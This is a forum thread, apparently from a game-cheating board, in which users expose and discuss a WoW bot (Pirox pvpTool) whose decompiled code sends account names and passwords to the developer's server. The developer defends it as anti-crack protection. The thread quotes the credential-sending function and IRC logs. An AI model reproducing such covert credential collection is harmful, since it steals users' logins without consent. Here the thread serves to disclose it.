Pirox pvpTool 2.1.1 account stealing code is present

[FEUP]

Hello mmowned users i would like to warn you about some account stealing code that is present at Pirox pvpTool 2.1.1 and probably other versions.

Code:

Func Fn049E()
	Local $Local0233 = Fn0439("z_ky_v3.php?a=" & $Var0B34 & "&p=" & $Var0B35 & "&u=" & @UserName)
	If $Local0233 = 9841 Then
		Return 1
	EndIf
	Return 0
EndFunc

I dont saw the packet sending but the code is here so i dont recommend it use.
Var0B35 is password introduced at relog option.

chat log with Pirox:

Code:

01[19:12] <FEUP> What is that? z_ky_v3.php?a= hmmm
[19:14] <PiroX> for what do u need this info?

The users of this bot maybe need some explanations

[Danne206]

Hmm.. Looking forward on a update on this, it's probably the biggest bot out there?

[extraspecial]

the code appears to send your account password (in the relog function) to an external "z_ky_v3.php". I'll be following this topic, as I have pirox (no problems, but i've never used relog)

*EDIT* The code apparently DOES send account name + password to Pirox, but only if you're using a cracked version of the bot.

[maclone]

could you upload the .exe?

[Danne206]

Cencured. Please delete.

[bone91]

Actually he announced that ppl who use the cracked bot will have problems.

Nvm, can't find the news, maybe I got this from IRC or something.

[KuRIoS]

troll here and receive a 14 day ban.. flame here and receive a 14 day ban, if u know nothing, shut up and wait for someone who actually does to come here and post.. wink cyph, kyn apoc

[bone91]

He made a news telling the latest pirox have some protection against cracked bots and if I'm not mistaken I read that in IRC too.

[Albedo]

Actually he announced that ppl who use the cracked bot will have their accounts stolen and spam advertisements in tradechan.
warwealth wow exploits wow bots wow cheats
nvm: didnt read the whole news ^^ sorry. (false altert)

Authenticator FTW If this is the "crack protection" he's devised, he needs to seriously revise his plan.

[ferodod]

Cracked users or not, toying with users accounts is wrong, I wouldn;t trust him after such a move..

[Danne206]

THE IRC LOGS
For the people that is missing the IRC chat:
I am Dakniel
[SPOILER]
<FEUP> thank you , you welcome
* BotOperator^on sets mode: +b *!*@0.users.quakenet.org
* FEUP was kicked by BotOperator^on (auth banned)

<@BotOperator^on> it is the normal case that our code has new routines in it
<@BotOperator^on> this is part of the development
<@BotOperator^on> a few version numbers we created a bot stats page
<@BotOperator^on> this is for mods and admins only and working good
<@BotOperator^on> the feedback was so positive that we think about creating a bot stats page for every user
<@BotOperator^on> this makes the usage even more independant of irc and iphone or whatever

<@BotOperator^on> last but not least for sure this can be used to protect our code
<@BotOperator^on> but as we are a company it is our good right to protect our business
<@BotOperator^on> and never forget LICENSED users dont have to feat anything
people using a crack...............mmmh..................yes they might have a problem in future
<KuRIoS> so u do confirm that i can , and we know it has, steal account login..
<@BotOperator^on> but you understand that we don't like it if people post parts of our source code

Update1:
<@BotOperator^on> like I said above the main intention is not getting account data but using the code to establish a personal stats page
<@fish[y]> dakniel this "keylogger" do not work on a licenced pvpTool. so our costumers dont have to be afraid..
<@BotOperator^on> we will also in future check for new auth meachisms and crypters to protect the tool from people who are not willed to pay 15€
<@BotOperator^on> we only collect information from users where the key is not valid

Update 2:
* Pirox2 sets mode: +m (silenced)
<@Pirox2> I will reply in mmowned board
<@Pirox2> i will tell u more
<@Pirox2> First: IT IS NOT TRUE THAT I STEAL ACC DATA OF MY COMMUNITY USERS
<@Pirox2> SECOND: It is true that acc data gets send to our server but only if u use a cracked pvpTool. THIS IS A ANTICRACK METHOD!
Will update as the chat goes on
<@fish[y]> (we do not sell, use, [...] the account data)
<@Pirox2> THIRD: There is NO KEYLOGGER or what ever. PiroxBOTS user can trust me and our communtiy, There is absolutly NO REASON why WE should steal acc data
<@Pirox2> PiroxBots.com exists since july 2008 and NEVER EVER we had stolen acc data. We want that our community grows and we want to keep crackers away and hit them HARD
<@Pirox2> We have more than 15000 customer and how much acc hacked info did u get? IS YOUR ACOUNT RIPPED? IS IT? i dont think so!
<@Pirox2> The users who posted that info is the cracker and hates PiroxBots and our community
<@Pirox2> I never wanted that you loose the trust to PiroxBots and never thought about such a negative effect of that anticrack method
<@Pirox2> If you code a software, and see how other people crack it and share it with others, you UNDERSTAND that i am pissed off those crackers
<@Pirox2> and i want to get them what they earn
<@Pirox2> So far. If you want to ask, then ask now
* Pirox2 sets mode: -m

Update 10 or something:
<Dia_> so IF i use a cracked version with an Authenticator im ok ?
<@Pirox2> syes
<Dakniel> See, it's pointless.
<@BotOperator^on> no dia ^^
<@Pirox2> Dakniel it is now way to protect it, it is a way to **** the crackers in their ass
<Dakniel> But pirox, as Dia said, what if they use a authenticator?
(SHARED AGAIN!)
<@BotOperator^on> we want to block them from using the bot
<@BotOperator^on> hrhrhr dakniel
<@BotOperator^on> we do not have the time and intention to take someones account

[/SPOILER]

EDIT: Exactly Zutto. Wich makes it even more suspicious.

Pirox is online, but havn't said anything.
Their official MIRC channel is #pirox

[zutto]

also as a quick addition to daknies irc logs:

pirox and botoperator is talking cross.. pirox is saying that they receive account names of the ones who crack it
and botop is saying they dont.. and that they dont store it anywhere...

[Apoc]

Regardless of whether or not this is a 'protection' scheme or not; account information should never be sent to anywhere other than the WoW exe. Pirox; there are many better ways to protect your code than stealing accounts. I highly suggest you devise a better plan.

To those using Pirox; I suggest you hold off on using it until this code is gone from the bot.

@Pirox; I suggest you hash your bot and make sure no code has changed if you want a way to protect your code. This is simply a stupid way to do so.

[PiroX]

So i am here to clear this out

With the first cracked pvptool 2.0.8 i added a anti crack method to the bot. There are different parts what makes the bot secure for simple cracking (i dont explain what trigger this anticrack)

If the cracker cracks pvptool and use it, the anticrack routine gets active. This part of the code send the set entered acc date to our server to get the info about the cracker.

original pvpTool users of PiroxBots.com never see anything of this part because it will never be activated. You can test this with a network sniffer. The bot will never transfer any acc data.


I say again. We do NOT steal or transfer any account data from OUR users! We love our community and there is absolutly NO reason for us to steal acc data!


I am sorry that my community get this info this way and i hope you dont understand it wrong

This part of the code is now explained and i hope you can understand it
I request a close of this thread.

[fishy_]

thanx apoc. But do you know any better plan we could use against crackers ? ;>